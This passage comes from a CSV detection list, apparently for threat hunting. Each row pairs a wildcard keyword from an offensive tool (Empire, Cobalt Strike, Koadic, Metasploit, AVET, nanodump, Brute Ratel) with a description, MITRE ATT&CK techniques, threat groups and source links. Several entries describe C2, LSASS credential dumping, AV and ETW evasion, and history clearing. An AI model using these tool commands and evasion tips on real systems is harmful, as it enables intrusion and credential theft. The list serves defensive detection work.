- T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*set CollectionMethodAll*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*set COMPlus_ETWEnabled=0*","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? 
Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*set havoc *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*set history +o*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*set hosts_stage*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*set keylogger*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*set LFILE /*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*Set Listener dbx*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*set Listener onedrive*","offensive_tool_keyword","empire","Empire is a 
post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*set obfuscate *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 
- T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*set payload *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*set PAYLOAD *","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*set pipename *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*set Profile apt1.profile*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - 
T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*set shellcode *","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"*set smartinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*set userwx*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*set zombie *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*set_child werfault.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*set_command_exec exec_via_cmd*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*set_command_exec exec_via_powershell*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*set_command_exec no_command*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*set_command_source download_bitsadmin*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*set_decoder xor*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*set_empty_pw.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","6","556","144","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z" +"*set_injection_technique*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*set_logon_script.py*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" +"*set_objectpipe \\*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*set_payload_execution_method exec_shellcode64*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. 
which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*set_payload_execution_method inject_dll*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*set_payload_info_source from_command_line_raw*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*set_payload_source download_powershell*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. 
as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*set_rpc_callstack*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*set_shellcode","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"*set_svchost_callstack*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*set_wmi_callstack*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*set_wmiconfig \*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*setc_webshell*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang 
